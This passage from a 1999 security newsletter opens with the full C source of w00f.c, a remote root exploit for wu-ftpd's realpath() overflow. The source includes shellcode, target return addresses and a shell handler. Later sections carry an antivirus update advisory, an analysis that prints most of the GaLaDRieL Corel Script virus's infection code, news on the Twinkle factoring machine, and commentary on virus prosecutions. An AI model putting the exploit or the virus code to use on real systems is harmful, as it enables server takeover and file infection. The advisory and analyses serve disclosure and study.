98/14/01, EN, April 1999, PE 168.184/part 4/4 [No information on part 1/4] @HWA 43.0 WuFTPd exploit w00f.c ~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 1 May 1999 21:59:50 +0200 Reply-To: Mixter <mixter@MIXTER.ORG> Sender: Bugtraq List <BUGTRAQ@netspace.org> From: Mixter <mixter@MIXTER.ORG> Subject: wuftp2.4.2academ beta 12-18 exploit To: BUGTRAQ@netspace.org this works on a lot of wu-ftpd`s also uses other commands than MKD to exploit realpath() overflow /* * Remote/local exploit for wu-ftpd [12] through [18] * gcc w00f.c -o w00f -Wall -O2 * * Offsets/padding may need to be changed, depending on remote daemon * compilation options. Try offsets -5000 to 5000 in increments of 100. * * Note: you need to use -t >0 for -any- version lower than 18. * Coded by smiler and cossack */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <unistd.h> #include <errno.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> /* In a beta[12-17] shellcode_A overflow, we will not see responses to our commands. Add option -c (use chroot code) to fix this. */ unsigned char hellcode_a[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20" "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd" "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff" "\x0f\x42\x49\x4e\x0f\x53\x48"; unsigned char hellcode_b[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80" "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e" "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31" "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03" "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89" "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d" "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80" "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31" "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; char *Fgets(char *s,int size,FILE *stream); int ftp_command(char *buf,int success,FILE *out,char *fmt,...); int double_up(unsigned long blah,char *doh); int resolv(char *hostname,struct in_addr *addr); void fatal(char *string); int usage(char *program); int tcp_connect(struct in_addr host,unsigned short port); int parse_pwd(char *in,int *pwdlen); void RunShell(int thesock); struct type { unsigned long ret_address; unsigned char align; /* Use this only to offset \xff's used */ signed short pad_shift; /* how little/much padding */ unsigned char overflow_type; /* whether you have to DELE */ char *name; }; /* ret_pos is the same for all types of overflows, you only have to change the padding. This makes it neater, and gives the shellcode plenty of room for nops etc */ #define RET_POS 190 #define FTPROOT "/home/ftp" /* the redhat 5.0 exploit doesn't work at the moment...it must be some trite error i am overlooking. (the shellcode exits w/ code 0375) */ struct type types[]={ { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", }, { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", }, { 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", }, { 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", }, { 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", }, { 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", }, { 0,0,0,0,NULL } }; struct options { char start_dir[20]; unsigned char *shellcode; unsigned char chroot; char username[10]; char password[10]; int offset; int t; } opts; /* Bit of a big messy function, but hey, its only an exploit */ int main(int argc,char **argv) { char *argv0,ltr; char outbuf[1024], inbuf[1024], ret_string[5]; int pwdlen,ctr,d; FILE *cin; int fd; struct in_addr victim; argv0 = strdup(argv[0]); *opts.username = *opts.password = *opts.start_dir = 0; opts.chroot = opts.offset = opts.t = 0; opts.shellcode = hellcode_a; while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){ switch (d) { case 'c': opts.shellcode = hellcode_b; opts.chroot = 1; break; case 's': strcpy(opts.start_dir,optarg); break; case 'o': opts.offset = atoi(optarg); break; case 't': opts.t = atoi(optarg); if ((opts.t < 0)||(opts.t>5)) { printf("Dont have that type!\n"); exit(-1); } } } argc -= optind; argv += optind; if (argc < 3) usage(argv0); if (!resolv(argv[0],&victim)) { perror("resolving"); exit(-1); } strcpy(opts.username,argv[1]); strcpy(opts.password,argv[2]); if ((fd = tcp_connect(victim,21)) < 0) { perror("connect"); exit(-1); } if (!(cin = fdopen(fd,"r"))) { printf("Couldn't get stream\n"); exit(-1); } Fgets(inbuf,sizeof(inbuf),cin); printf("%s",inbuf); if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0) fatal("Bad username\n"); if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0) fatal("Bad password\n"); if (*opts.start_dir) if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0) fatal("Couldn't change dir\n"); if (ftp_command(inbuf,257,cin,"PWD\n")<0) fatal("PWD\n"); if (parse_pwd(inbuf,&pwdlen) < 0) fatal("PWD\n"); srand(time(NULL)); printf("Making padding directorys\n"); for (ctr = 0;ctr < 4;ctr++) { ltr = rand()%26 + 65; memset(outbuf,ltr,194); outbuf[194]=0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); } /* Make padding directory */ ctr = 124 - (pwdlen - types[opts.t].align);//180 //ctr = 152 - (pwdlen - types[opts.t].align); ctr -= types[opts.t].pad_shift; if (ctr < 0) { exit(-1); } memset(outbuf,'A',ctr+1); outbuf[ctr] = 0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); memset(outbuf,0x90,195); d=0; for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++) outbuf[ctr] = opts.shellcode[d++]; double_up(types[opts.t].ret_address-opts.offset,ret_string); strcpy(outbuf+RET_POS,ret_string); strcpy(outbuf+RET_POS+strlen(ret_string),ret_string); printf("Press any key to send shellcode...\n"); getchar(); if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (types[opts.t].overflow_type == 1) if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0) fatal("DELE\n"); /* HEH. For type 1 style we add a dele command. This overflow occurs in delete() in ftpd.c. The cause is realpath() in realpath.c not checking bounds correctly, overwriting path[] in delete(). */ RunShell(fd); return(1); } void RunShell(int thesock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(thesock,&rset); FD_SET(STDIN_FILENO,&rset); select(thesock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(thesock,&rset)) { n=read(thesock,recvbuf,1024); if (n <= 0) { printf("Connection closed\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } return; } int double_up(unsigned long blah, char *doh) { int a; unsigned char *ptr,*ptr2; bzero(doh,6); ptr=doh; ptr2=(char *)&blah; for (a=0;a<4;a++) { *ptr++=*ptr2; if (*ptr2==0xff) *ptr++=0xff; ptr2++; } return(1); } int parse_pwd(char *in, int *pwdlen) { char *ptr1,*ptr2; /* 257 "/" is current directory */ ptr1 = strchr(in,'\"'); if (!ptr1) return(-1); ptr2 = strchr(ptr1+1,'\"'); if (!ptr2) return(-1); *ptr2 = 0; *pwdlen = strlen(ptr1+1); /* If its just "/" then it contributes nothing to the RET_POS */ if (*pwdlen==1) *pwdlen -= 1; printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen); return(1); } int tcp_connect(struct in_addr host,unsigned short port) { struct sockaddr_in serv; int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&host,sizeof(struct in_addr)); serv.sin_port = htons(port); serv.sin_family = AF_INET; if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) { return(-1); } return(fd); } int ftp_command(char *buf,int success,FILE *out,char *fmt,...) { va_list va; char line[1200]; int val; va_start(va,fmt); vsprintf(line,fmt,va); va_end(va); if (write(fileno(out),line,strlen(line)) < 0) return(-1); bzero(buf,200); while(1) { Fgets(line,sizeof(line),out); #ifdef DEBUG printf("%s",line); #endif if (*(line+3)!='-') break; } strncpy(buf,line,200); val = atoi(line); if (success != val) return(-1); return(1); } void fatal(char *string) { printf("%s",string); exit(-1); } char *Fgets(char *s,int size,FILE *stream) { char *ptr; ptr = fgets(s,size,stream); //if (!ptr) //fatal("Disconnected\n"); return(ptr); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } int usage(char *program) { fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program); fprintf(stderr,"\t[-o offset] [-t type]\n"); fprintf(stderr,"types:\n"); fprintf(stderr,"0 - %s\n", types[0].name); fprintf(stderr,"1 - %s\n", types[1].name); fprintf(stderr,"2 - %s\n", types[2].name); fprintf(stderr,"3 - %s\n", types[3].name); fprintf(stderr,"4 - %s\n", types[4].name); fprintf(stderr,"5 - %s\n", types[5].name); fprintf(stderr,"\n"); exit(0); } /* -EOF- */ @HWA 44.0 VirusScan NT advisory from Simple Nomad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.LNX.3.96.981029195851.113B-100000@vortex.nmrc.org> Date: Thu, 29 Oct 1998 20:01:56 -0600 Reply-To: Simple Nomad <thegnome@NMRC.ORG> Sender: Bugtraq List <BUGTRAQ@netspace.org> From: Simple Nomad <thegnome@NMRC.ORG> Subject: NAI AntiVirus Update Problem To: BUGTRAQ@netspace.org _______________________________________________________________________________ Nomad Mobile Research Centre A D V I S O R Y www.nmrc.org Simple Nomad [thegnome@nmrc.org] 05May1999 _______________________________________________________________________________ Platform : Microsoft NT 4.0 Application : Network Associates' VirusScan NT Severity : Medium Synopsis -------- Network Associates VirusScan NT (formerly McAfee VirusScan NT) version 4.0.2 does not properly update virus signature definition files under certain conditions, and will falsely report it is up to date during manual updates. This impacts both NT Server and Workstation. Tested configuration -------------------- Microsoft NT Server 4.0 w/SP3, Network Associates VirusScan NT version 4.0.2. Microsoft NT Workstation 4.0 w/SP3 and SP4, Network Associates VirusScan NT version 4.0.2. Pre-4.0.2 versions of VirusScan NT were not tested, nor were versions for other platforms, such as Windows 95 or 98. Bug(s) report ------------- Network Associates VirusScan NT has a feature that allows for a user to update the virus definitions file via ftp. This task can also be automated via the VirusScan NT AntiVirus Console. In version 4.0.2, the scan engine holds open the main definition file scan.dat (located in the VirusScan NT directory) during the ftp process, preventing the file from being overwritten with the new version. The engine itself apparently does not check return codes and will not notify the user that the file was not updated. Worse, the Application Log is updated as if the install completed properly, therefore subsequent downloads of new definition files will not update the scan.dat properly. Subsequent manual downloads will in fact tell you that you already have the latest definition file when in fact you do not. NMRC was not able to make this error occur consistently, and we strongly suspect that a race condition exists where the updates will occasionally work, but we were able to duplicate the error condition most of the time. Testing was done in NMRC labs, and at two corporate locations. To verify the proper definitions file, check the About box from the AntiVirus Console program for the latest date next to the text "Created On". If after a manual or automatic update this date does not change, your definitions have not been properly updated. The implication here is that the administrator or end user believes their system is protected when it in fact is not. Solution/Workaround ------------------- Upgrade to Network Associates VirusScan NT version 4.0.3a, which resolves the problem. Alternately, disable the VirusScan engine, wait several seconds for the operating system to close the file, and manually copy the definition files into the VirusScan NT directory. This second method will place your log files out of sync with the definition files until the next manual or automatic download, but this should not impact functionality. It is recommended that you disable 4.0.2 (or even uninstall) before performing an upgrade to 4.0.3a due to other problems we encountered during the testing of this product, such as being unable to properly stop the VirusScan services before upgrading. Once again, these problems were inconsistent but happened several times on several systems. One further note, in a restricted NT workstation environment, it is next to impossible to have the user upgrade the product themselves. Local admin rights are required to make this happen, and this will require a visit from an individual with adequate rights to the workstation to complete the upgrade. Comments -------- Network Associates has been notified and recommend the upgrade to 4.0.3a to resolve the problem. This problem was discovered while investigating why upgraded machines were still infected by various Microsoft Word macro virii after they had been upgraded to the latest definition files. Network Associates can be reached at http://www.nai.com/. Unfortunately at the time of this writing the ftp location of the 4.x definition files was not present. It's supposed to be at ftp://ftp.nai.com/pub/antivirus/update/4.x but had disappeared from the server(s). _______________________________________________________________________________ Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org // @HWA 45.0 New CorelDraw Virus ~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ CorelDraw virus found Astral 07.05.1999 17:15 HispaSec discovred virus in CorelDraw.This is first virus based on CorelDraw Script.Virus is named GaLaDRieL.Once this virus gets in your computer it affects files by adding victima$ label in CSC file once added also adds yo_estoy_en$ label in same CSC file and after both labels are added it modifies LothLorien label.More about it on HispaSec. 6-5-1999 - HispaSec discovers the first virus for Corel Draw We introduce "GaLaDRieL", the first virus ever based on Corel Script, the computer language designed for Corel Draw's task and script automation. Albeit its effects are not harmful, we're undoubtedly dealing with an innovation in the macro virus area which may open a new way of development. Corel Script is the language, based upon the popular BASIC, designed for macro coding in the Corel pack. A macro is a computer program which runs a series of instructions so as to automate repetitive tasks, or to simplify complex actions, as well as to ask for entries, view messages or to swap information with other applications. This is what Corel Draw calls "scripts", a kind of files with "CSC" as extension, which are the victims of this new brand virus. In the first line of its code we can find the virus identification: name, author, and virus writing group its author belongs to. --------- REM ViRUS GaLaDRieL FOR COREL SCRIPT bY zAxOn/DDT --------- After this, the virus gets the system date and checks whether it coincides with june 6th of any year. When this happens, the virus jumps to a label called "Elessar", where its payload can be found, which consists on displaying an excerpt from "The Lord Of The Rings". Anyhow the program eventually jumps to a label called "Palantir". --------- fecha$=GetCurrDate () If Left(fecha$,1)="6" Then If Mid(fecha$,3,2)="06" Then Goto Elessar Goto Palantir Elessar: Mensajito$= " Ai! lauri� lantar lassi s�rinen!. Y�ni �n�time ve r�mar aldaron, y�ni ve linte yuldar v�nier mi oromardi lisse-miruv�reva And�ne pella Vardo tellumar nu luini yassen tintilar i eleni �maryo airet�ri-lirinen. ...." Titulo = "GaLaDRieL ViRUS bY zAxOn/DDT" Messagebox Mensajito$,Titulo,64 ---------- The virus looks for the first file containing the "CSC" extension (Corel Script) with the attributes 32 or 128, which stand for normal files. When it finds such a victim, the virus opens it for reading and checks for the text string "REM ViRUS", which determines whether the file has been previously infected. When it finds a suitable victim according to its own features, then assings the file name to the variable called "victima$". ---------- Palantir: nombre$=FindFirstFolder ("*.csc",32 or 128) Do while not nombre$="" Open nombre$ For Input As #1 Palacios_Intemporales: Line Input #1,linea$ If linea$="" then goto Palacios_Intemporales if victima_bool=1 Then Goto Esgaroth If Instr(linea$,"REM ViRUS",1)=0 then victima$=nombre$ victima_bool=1 End if ----------- The virus then keeps on looking for files fitting its search wildcard ("CSC" extension and attributes 32 or 128, by means of the "FindNextFolder()" instruction). When the virus finds an infected file through this second search, it proceeds to store its file name into the "yo_estoy_en$" variable. Once both the victim ("victima$") and the already infected file ("yo_estoy_en$") are ready, the virus jumps to a label called "LothLorien". For those cases in which the virus is not able of finding any of the two files mentioned above, the virus skips the infection process and jumps to a new label, called "Los_Puertos_Grises". ----------- Esgaroth: If Instr(linea$,"REM ViRUS",1)<> 0 Then yo_estoy_en$=nombre$ conocimiento=1 End if Close If conocimiento=1 Then If victima_bool=1 Then Goto LothLorien nombre$=FindNextFolder () If nombre$="" Then Goto Los_Puertos_Grises Loop ----------- In its last stage we have the chance to find a rather peculiar, bad optimized, way of infecting the victim file with the virus body. The first step consists on deleting a temporal file called "mallorn.tmp", which might be found in the system because of previous infections. It renames then the victim file to "mallorn.tmp", by means of the instruction "Rename victima$,"mallorn.tmp",0". The last parameter ("0") indicates that in those cases in which the "mallorn.tmp" file would already exist (even though it was supposed to have been previously deleted by the virus itself) it would be overwritten. This is just a small example of the poor code optimization of the infection routine. After having performed the above operations, the virus opens the file specified by the "yo_estoy_en$" variable for reading and then the one pointed to by "victima$" for writing. After this, and by means of a loop, GaLaDRieL parses its code, line by line, until reaching the "REM END" string, which tells the virus the process is done. It closes then both files and reopens the victim file, this time in "Append" mode, in order to attach, by means of this method, the code lines which belong to the original script code, previously saved to the "mallorn.tmp" file. Eventually the virus deletes one more time the temporary file, and the last thing we find in its code is the text line we've just talked about, the one which tells GaLaDRieL where the tail of the virus body is located at. ----------- LothLorien: Kill "mallorn.tmp" Rename victima$,"mallorn.tmp",0 Open yo_estoy_en$ For Input As #1 open victima$ For Output As #2 Do While Not Left(linea$,7)="REM END" Line Input #1,linea$ Print #2,linea$ Loop Line Input #1,linea$ Print #2,linea$ Close Open victima$ For Append As #1 Open "mallorn.tmp" For Input As #2 Do While Not Eof(2) Line Input #2,linea$ Print #1,linea$ Loop Close Kill "mallorn.tmp" Los_Puertos_Grises: REM END OF ViRUS GaLaDRieL bY zAxOn/DDT ------------ There's no doubt about the fact that we're talking about a virus which won't travel too far, something to which we could add its poor code optimization. >From this, it's not difficult to guess that its author's purpose was to show the viability of developing viruses in this new environment, leaving back other kinds of more commonly infected victims. Suming up, we're dealing with an innovating virus in which concerns to the platform it's designed to work in, and that it can mean the begin of a new macro virus family for Corel Draw. Bernardo Quintero @HWA 46.0 TWINKLE, the number crunching machine to attack RSA keys ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.projectgamma.com/ http://www.projectgamma.com/news/16.html Twinkle: The Magic Light That Breaks The Code May 6, 1999, 22:45 Author: i_am_online Twinkle and you're done, the magic light that breaks the code. Computer scientist Adi Shamir who is a co-creator of the RSA public key algorithm has developed a computer that is light based and that can decode data to an extent far past what is normally used in e-commerce. Its name is �Twinkle,� and Adi Shamir this Tuesday in Prague demonstrated it at the 1999 Eurocrypt conference. Twinkle can find the correct key, efficiently, for decrypting messages that have been encrypted with 512-bit keys, said Shamir. The Twinkle design goes with prior expectations about the consequence of RSA keys as long as 512 bits. But key sizes larger are still out of reach aside Shamir's progress in code breaking. What Twinkle stands for is "The Weizmann Institute Key Locating Engine." Twinkle is very different than that of the electronic design of a normal computer; Twinkle is based solely on optoelectronics, which use light to transfer info digitally. Shamir predicts that the Twinkle mechanism would be as effective as about 100 to 1,000 PCs. Not just that, but the machine could be easily built with little funding, Shamir says that a Twinkle machine could be built for as little as $5,000. On the other hand the DES Cracker cost the Us government $250,000 to build. This report was partly contributed by Wired Related Links: Wired News http://www.wired.com/news/news/technology/story/19493.html RSA http://www.rsa.com ZDNN Indirectly Related http://www.zdnet.com/zdnn/stories/news/0,4586,2254799,00.html Wired; The Light That Cracks the Code by Chris Oakes 5:00 p.m. 4.May.99.PDT A computer scientist has designed a light-based computer that could unscramble data to a degree well beyond that typically used in e-commerce. "Twinkle," a yet-to-be-built crypto-cracking machine, was introduced Tuesday by famed computer scientist Adi Shamir at the Eurocrypt '99 conference in Prague. Shamir's Twinkle proves an oft-repeated point: To adequately hide electronic information from prying eyes, data needs to be locked up beyond the limits of technology in common use today. The strength of a given cryptography scheme is expressed in the number of bits in the "key" required to unlock the code. For example, popular encryption programs used in the United States support the equivalent of 1024- to 2048-bit security. Each additional bit doubles the strength of the cipher from trial-and-error attacks. Twinkle can quickly determine the correct key for unlocking messages that have been encrypted with 512-bit keys, said Shamir, who is also co-inventor of the RSA public-key algorithm -- a de facto standard for Internet security. "[This] remind[s] people that yes, what the experts have been saying about key size is really the case," said Burt Kaliski, chief scientist at pioneer encryption company RSA Data Security, which built its business around the encryption algorithm. Kaliski said the Twinkle design confirms previous expectations about the appropriateness of RSA keys as long as 512 bits. But he emphasized that larger key sizes are still out of reach despite Shamir's advance. "The primary impact [of Twinkle] is that it makes 512-bit keys for RSA more at risk than was previously considered," said Kaliski. "It will have a similar effect to the Deep Crack machine." Deep Crack is a specially designed supercomputer that in July 1998 first cracked the level of encryption used to secure most nonclassified government data. In January 1999, with an Internet-wide volunteer computer effort and the Electronic Frontier Foundation behind the project, Deep Crack unlocked a message secured with the 56-bit Data Encryption Standard -- the equivalent of a 384-bit RSA key -- in a mere 22 hours and 15 minutes. Deep Crack was designed to send a message to the US government that the strongest data-scrambling technology legally allowed to leave American shores is no longer strong enough to be useful. Public-key cryptography is secure because it hinges on a mathematical truth -- it's very difficult to find two prime factors of another known number. The Twinkle machine would greatly accelerate the process of collecting equations, which is the first step in factoring a large number. This step, known as "sieving," is a key to deciphering an RSA-encrypted message. The second step in the factoring process entails calculating the equations once they are collected, and it is the main method for determining an RSA key. Twinkle stands for "The Weizmann Institute Key Locating Engine." Unlike the purely electronic design of the conventional computer, Twinkle is based on optoelectronics, which uses light to transmit digital information, similar to the way fiber-optic cables rely on light instead of electrical impulses over copper wire to transmit signals. Shamir estimates that the device would be as powerful as about 100 to 1,000 PCs in the factoring process. Further, the machine could be easily built with little funding. While the DES Cracker cost US$250,000 to construct, a Twinkle machine could be built for as little as $5,000, he said. Bruce Schneier, president of cryptography firm Counterpane Systems said Shamir has come up with a very clever approach to an academic problem. "This is brilliant, really brilliant stuff," Schneier said. "Once you read the paper it's extremely obvious. There's a lot of engineering between the paper and reality. But it's certainly doable. Nothing [in the design] is insurmountable." The significance of Twinkle is mathematical, rather than a political statement about encryption, Schneier said. "This is academic research." Encryption expert Matt Blaze, an encryption researcher at AT&T Labs, said Twinkle doesn't change the theoretical strength of the RSA encryption algorithm. But "if Twinkle's approach turns out to be practical it will force us to reconsider the appropriate minimum length of RSA keys." Blaze does see potential political repercussions from Shamir's advance. "If Twinkle is practical, it would provide a similar demonstration of the weakness of the public key systems allowed for export." Will anyone seek to build a machine based on Twinkle? No doubt, Schneier said. "If you were a government and your business is learning what other governments are saying, you'd be a fool not to build this machine. I'm sure the [National Security Agency] is studying it very carefully." @HWA 47.0 25 fired due to e-mail abuses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ 25 FIRED BECAUSE OF E-MAIL ABUSE by BHZ, Saturday 8th May 1999 on 2:39 pm CET About 25 employees who used electronic mail for non-business reasons have been fired at Edward Jones, successfully brokerage firm. Spokeswoman from the firm didn't share information about what did they actually do, but she said: "It is not acceptable to use the Internet for nonbusiness-related purposes. Read the article below http://www.postnet.com/postnet/stories.nsf/86964efc7e86f67886256743007c8f4b/a118a96450a70b548625676a00385c01?OpenDocument Brokerage firm here fires 25 for e-mail abuse By Paul Hampel Of the Post-Dispatch About 25 employees who used electronic mail for non-business reasons have been fired at Edward Jones, a spokeswoman for the brokerage firm said Thursday. Besides last week's firings, another 48 employees were suspended, said one employee, who asked not to be identified. "When people get Internet access at Edward Jones, they know the policy of the firm," said Mary Beth Heying, a spokeswoman for the company. "It is not acceptable to use the Internet for nonbusiness-related purposes." She refused to say specifically why the employees were disciplined, what the company's e-mail policies are and how the disciplined employees had violated them. Several employees who spoke anonymously said they understood that some of the infractions involved off-color jokes. "E-mail goes through the Internet," Heying said. "So, generally speaking, we're talking about people whose employment was terminated for Internet abuse." The company, which has its headquarters here, issued a memo on April 27 that instructed employees who had sent e-mails containing pornography or off-color jokes to report to the personnel office by April 29, one employee said. Like all the Edward Jones employees interviewed for this story, the employee asked that his name not be used. The day after the memo was circulated, the personnel department was jammed with people wondering if they had violated the policy, said the employee. "Nothing got done last week at Edward Jones," he said. "Everyone was freaked out." Heying issued a statement on behalf of the company that said: "We at Edward Jones have zero tolerance with regard to Internet abuse. This policy has been clearly communicated to our associates. "Although we cannot comment on specific situations, we have a responsibility to provide our nearly 14,000 associates a workplace free from Internet abuse." Heying said the firings were confined to the 2,300 employees distributed among the three campuses that make up the company's international headquarters. They're located in Maryland Heights, in Maryville Center in West County and in Des Peres. The brokerage firm - which Heying said was the world's ninth largest - also operates 5,000 branch offices across the country, as well as in Canada and the United Kingdom. The firings did not affect the branches, she said. Employees interviewed Thursday afternoon on the parking lot at the Maryland Heights campus at 201 Progress Parkway said rumors were circulating that the number of people fired was higher than Heying's estimate. Some saw a rainbow in the firings. "This is awful to say, but the firing could actually be good news for me," said one young employee. "It could mean I'll move up in this company." Another employee, a woman, said she had heard that some of those fired had been sending dirty jokes to one another. "All the big companies seem to be firing people for sending dirty e-mails," she said. " It's happened the last two or three places I've worked." A former Edward Jones employee, who left to pursue other business interests, said the company zealously monitored employee communications. "Edward Jones is the most technologically advanced firm I've ever seen," said the man. "They monitor telephone calls and e-mails. They are able to track everything." @HWA 48.0 Punishment CIH vs MELISSA ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ PUNISHMENT by BHZ, Saturday 8th May 1999 on 2:33 pm CET SF Gate published an article about two actual virus cases: David Smith's (Melissa creator) and Chen Ing-hau's (CIH creator). They do some parallels between them, and from it some strange things could be seen. CIH virus was more destructive (because it deletes all data), but its creator was just suspended from his university. David Smith could get up to 40 years of imprisonment. Read the article below; http://www.sfgate.com/technology/expound/ Stopping The Deadly Virus Punishment won't cure this ill Neil McAllister, Special to SF Gate Perhaps the only thing more frustrating than the damage caused by viruses is the realization that one has very little recourse when they do strike. They're a hit-and-run by an unknown assailant. No wonder Melissa virus creator David Smith's arrest and pending trial is viewed by many with such pernicious glee. For once, it seems, one of these faceless delinquents will be brought to justice, and get what he deserves. Compare Smith's case with that of Taiwanese information engineer Chen Ing-hau. Taipei authorities recently fingered the 24-year-old man as responsible for the highly damaging CIH, or "Chernobyl" virus -- so named because it strikes on anniversaries of the April 26, 1986 Soviet nuclear disaster. Chernobyl's last outbreak erased data on tens of thousands of computers worldwide, rendering many unusable. But while David Smith could potentially land more prison time than some repeat rapists, the only punishment Ing-hau has received to date for his role in creating the virus has been a demerit from the Tatung Institute for Technology, where he studied computer science. That was over a year ago. Unlike Melissa, it seems Chernobyl's victims have very little hope of restitution for data lost to the virus. So while there may be an opportunity to finally make an example of David Smith, I question whether slapping a programmer with a 40-year sentence will really contribute much to ending the threat of malicious software. Before we go blindly locking away virus authors, maybe we should first examine their motives. First an admission: David Smith and I have something in common. Perhaps my life of crime eventually might have landed me in the same spot in which Smith now finds himself -- had I maybe been just a little bit better at it. Melissa wreaked havoc on networks nationwide in March, using a combination of Microsoft's Word and Outlook software for Windows to spread copies of itself rapidly across the Internet, via email. The resulting flood of messages soon choked afflicted mail servers, rendering them incapable of processing genuine email as they struggled beneath the load of Melissa-generated mail. It was the first big virus outbreak of 1999. My own career in computer virus authoring ended years ago, before there was much of an Internet, and when MS-DOS was the PC operating system of choice. Dubbed Leprosy-B, my last (and somewhat ineffectual) virus was the follow-up to a similarly timid program I'd written earlier, called (predictably enough) Leprosy. About 10 minutes after putting the finishing touches on Leprosy-B, I accidentally let it loose on my own hard drive. It promptly infected half my development tools and a random number of system files, before I could get it in check. As I embarked on a long night of re-installing infected software, I got my first real taste of what a royal pain in the ass computer viruses can be. As a teenager, crippling entire computer networks worldwide was the farthest thing from my mind as I toiled late nights writing the Leprosy virus. For one thing, I just wasn't skilled enough a programmer to pull off such a feat -- but it was a lot easier to write a tiny virus program than a huge application, like a word processor. Today, even complete novices can create their own computer virus with the help of one of the several "virus construction kits" available for download from some hacker sites on the 'Net. Most virus software, in fact, remains no great wonder, relying on a small number of instructions to achieve a few clever tricks. It's generally a fluke when one manages to travel as widely and achieve its goal as successfully as Chernobyl or Melissa. While some virus outbreaks might accurately be categorized as industrial espionage, most virus authors seek little more for their efforts than a certain kind of notoriety within the computing underground. Getting your virus out into public circulation is a little like spray painting your name on walls: It's a way to gain recognition amongst your peers. But while most graffiti taggers might hesitate before defacing the ceiling of the Sistine Chapel, viruses generally make no distinction about which systems they destroy. Since most virus attacks tend to be executed with all the cunning of throwing eggs at a passing car, maybe the solution lies elsewhere besides prosecuting the authors of these tiny terrors. Maybe it's time we addressed the issue of what makes viral software possible to begin with. As the number of computer viruses has grown over the years, a cottage industry of anti-virus software has appeared to combat the problem. We regularly hear about anti-virus software causing various crashes and conflicts with other programs. None of these packages, however, does very much to strike at the root cause of computer viruses -- the vulnerability of the operating system itself. Sun Microsystems had the right idea with the "sandbox" security model of its Java language. Java applets downloaded from an untrusted source on the Web aren't allowed access to most of the OS features that would allow a virus to spread. Sun realized that the creation of a globally networked computer environment meant new security measures had to be developed to protect users from all their new neighbors. It's an idea as simple as installing a deadbolt on your front door. Contrast Sun's ideas to Microsoft's, whose decision to build a complete programming language into its word processor without any significant security measures spawned an entire new subcategory of Macro Viruses -- now one of the most commonplace forms of viruses encountered. Melissa itself fell into this category. Further, Microsoft's ActiveX technology for the Web can allow viral code to run virtually unchecked on a Windows computer directly over the network. I'm not about to say David Smith shouldn't be held responsible for damages caused by Melissa should he be found guilty of creating and releasing that virus. But I also feel it's the responsibility of software manufacturers to adapt to the vulnerabilities of today's networked computing model by creating secure software environments for us to work in. The technology exists; it's only a matter of making an effort to deploy it. Try 